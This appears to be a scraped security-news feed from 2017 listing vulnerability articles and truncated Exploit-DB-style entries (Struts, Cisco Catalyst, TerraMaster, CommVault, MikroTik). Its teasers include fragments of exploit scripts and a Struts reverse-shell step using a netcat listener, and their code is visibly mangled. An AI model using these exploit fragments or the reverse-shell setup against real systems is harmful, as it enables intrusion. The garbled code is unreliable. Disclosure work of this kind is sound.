Oracle Human Resources Management System PeopleSoft unauthorized remote code execution vulnerability parsing-vulnerability warning-the black bar safety net
A few months ago, I had the privilege of participating in security audits of several Oracle PeopleSoft deployment projects; the audits mainly targeted the PeopleSoft series Human Resources Management System (HRMS) and the PeopleTool development tools package. Throughout the online on the...
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root Exploit
Exploit for php platform in category web applications Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/ !/usr/bin/python coding: utf8 Exploit: Unauthenticated RCE as root. Vendor: TerraMaster Product: TOS import sys import requests def upload address, port...
MobaXtrem 10.2 Remote Code Execution
''' Exploit Title: MobaXtrem 10.2 telnet Server Remote Code Execution Date: 15/5/2017 Exploit Author: Sultan Albalawi Software Link: http://download.mobatek.net/10220170312132617/MobaXtermPortablev10.2.zip Version: 10.2 Tested on: win7 CVE : n/n video:...
CVE-2017-0199: analysis Microsoft Office RTF vulnerability-vulnerability warning-the black bar safety net
FireEye recently detected malicious Microsoft Office RTF documents exploiting CVE-2017-0199, a previously undisclosed vulnerability. When the user opens a document containing the exploit code, the malicious code will download and execute the...
CVE-2017-3881: Cisco Catalyst switches remote code execution vulnerability analysis-vulnerability warning-the black bar safety net
Is telnet enabled on your Catalyst switches? If so, you should be careful. This article introduces the reader to a proof-of-concept attack technique for the remote code execution vulnerability in the Catalyst 2960 switch running the latest firmware. Specific exploit...
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution
!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset' sys.exit elif sys.argv2 == '--unset': setcredless = False elif sys.argv2 == '--set': pass else: print sys.argv0 + ' host...
CVE-2017-2482
creationtimestamp | type | source
---|---|---
2017-04-04 00:00:00+00:00 | exploited | https://www.exploit-db.com/exploits/41796...
“Dishwasher” was traced to a directory traversal vulnerability; IoT security is getting worse and worse-vulnerability warning-the black bar safety net
Although the number of IoT devices is increasing exponentially, the security level of these smart devices has not improved, and users still face a high risk of cyber attack. Miele is a hundred-year-old home appliance brand founded in Germany; recently one model, the PG8528 networked medical...
Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking
Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices. There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C...
Windows DVD Maker 6.1.7 XXE Injection
Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: ================= Windows DVD Maker...
CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)
import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp s.sendpayl if r: data = s.recv10242 print "received %d...
WordPress REST API Bug Could Be Used in Stored XSS Attacks
The recently patched WordPress REST API Endpoint vulnerability is the gift that keeps on giving. Already responsible for more than one million website defacements and attempts to monetize some of those attacks, the flaw also opens the door to a separate attack. Researchers at Sucuri who found the...
Cerberus FTP Server 8.0.10.1 - Denial of Service
Cerberus FTP Server 8.0.10.1 - Denial of Service Exploit Title: Cerberus FTP server – Denial of Service Date: 2017-03-13 Exploit Author: Peter Baris Vendor Homepage: https://www.cerberusftp.com/ Software Link: download link if available Version: 8.0.10.1 Tested on: Windows Server 2008 R2 Standard...
Exploit for Improper Handling of Exceptional Conditions in Apache Struts
CVE-2017-5638 PoC Code in Python | DORK: ext:action Example Po...
Apache Struts 2 2.3.x / 2.5.x Remote Code Execution
CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - github.com/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrce.py...
Linux kernel local privilege escalation flaw in n_hdlc (CVE-2017-2636)
This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP). This driver provides HDLC serial line discipline and comes as ...
USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation
/ Exploit Title - USBPcap Null Pointer Dereference Privilege Escalation Date - 07th March 2017 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://desowin.org/usbpcap/ Tested Version - 1.1.0.0 USB Packet capture for Windows bundled with WireShark 2.2.5 Driver Version - 1.1.0.0 -...
MikroTik Router Denial Of Service | ARP Table OverFlow Exploit
Exploit for hardware platform in category dos / poc CVE:2017-6444 Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: https://mikrotik.com/ Series : Hap Lite Tested on: Parrot Security OS Date: 03-3-2017 Category: Netwo...
Unpatched SMB Zero Day Easily Exploitable
In what’s turning out to be the zero day that keeps on giving, researchers are still finding ways to exploit an unpatched denial of service vulnerability that exists in the way Windows implements the Server Message Block protocol. Details around the bug aren’t a mystery. Laurent Gaffié, the...
Microsoft releases update for Flash Player, but leaves two disclosed Flaws Unpatched
Microsoft on Tuesday released security update KB 4010250 to patch flaws in Adobe Flash Player for its customers using Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched. Just last week, Microsoft announced that its February...